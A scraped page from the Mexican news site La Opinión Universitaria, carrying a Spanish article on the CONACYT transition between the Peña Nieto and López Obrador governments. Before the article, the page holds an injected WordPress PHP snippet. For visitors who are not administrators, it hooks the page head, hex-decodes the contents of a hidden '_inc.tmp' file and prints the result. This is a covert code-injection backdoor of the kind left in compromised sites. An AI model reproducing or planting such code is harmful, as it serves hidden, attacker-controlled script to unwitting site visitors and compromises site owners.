if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Avanza proceso de entrega-recepción del Conacyt – La Opinión Universitaria La Opinión Universitaria
Menu

Avanza proceso de entrega-recepción del Conacyt

Por Marco Fierro

 

El Director General del Consejo Nacional de Ciencia y Tecnología (CONACYT), Enrique Cabrero Mendoza,  confirmó que avanza el proceso de transición con el gobierno del presidente electo, Andrés Manuel López Obrador, pues informo que ya ha habido reuniones con María Elena Álvarez Buylla, responsable de la dependencia para el próxima gestión.

 

De acuerdo con el funcionario federal, por instrucción tanto del Presidente de la República Constitucional, Enrique Peña Nieto  y electo (AMLO), el proceso de entrega-recepción se está realizando de manera organizada y con cooperación entre ambos gobiernos, por lo que ya se han llevado a cabo varias reuniones.

 

“Siguiendo pues lo que ha marcado el presidente Enrique Peña Nieta, como el presidente electo Andrés Manuel López Obrador de hacer esta transición algo muy bien organizado con mucha cooperación tanto del gobierno saliente como del gobierno entrante, por lo que ya hemos estado en reuniones con el equipo de la nueva titular María Elena Álvarez Buylla”, dijo.

 

Señaló que hay un permanente contacto entre las áreas del CONACYT y entre los responsables de ellas, ya que resaltó que la transición con tiempo y con equipos conformados de manera anticipada ha permitido presentar a los nuevos titulares, todos aquellos puntos que deben ser atendidos de forma inmediata.

 

Sobre la posibilidad de incrementar los recursos para la dependencia durante la próxima gestión, Cabrero Mendoza, dejó en claro que ese tema depende del presupuesto, aunque aprovechó para dar a conocer que en la administración federal de Peña Nieto se aumentó en un 50 por ciento la inversión.

 

Precisó que el actual gobierno federal ha creado nuevos laboratorios, entregado nuevo equipamiento, además de incrementar el número de becas de una forma significativa en un 40 por ciento y de prácticamente aumentar en un 70 por ciento el número de miembros del Sistema Nacional de Investigadores.

 

“El gobierno federal actual ha actualizado en crear nuevos laboratorios, nuevo equipamiento, además de incrementar el número de becas de una forma muy significativa, también en un 40 por ciento y de prácticamente aumentar en un 70 por ciento el número de miembros del Sistema Nacional de Investigadores”, expresó.

 

Sin embargo, admitió que todavía no se ha llegado a la meta que se tenía programada y ello tomará más tiempo, pues cada vez son necesarios más gobiernos estatales  que realmente inviertan con fuerza en ciencia y tecnología.

No comments

Deja una respuesta

Tweets recientes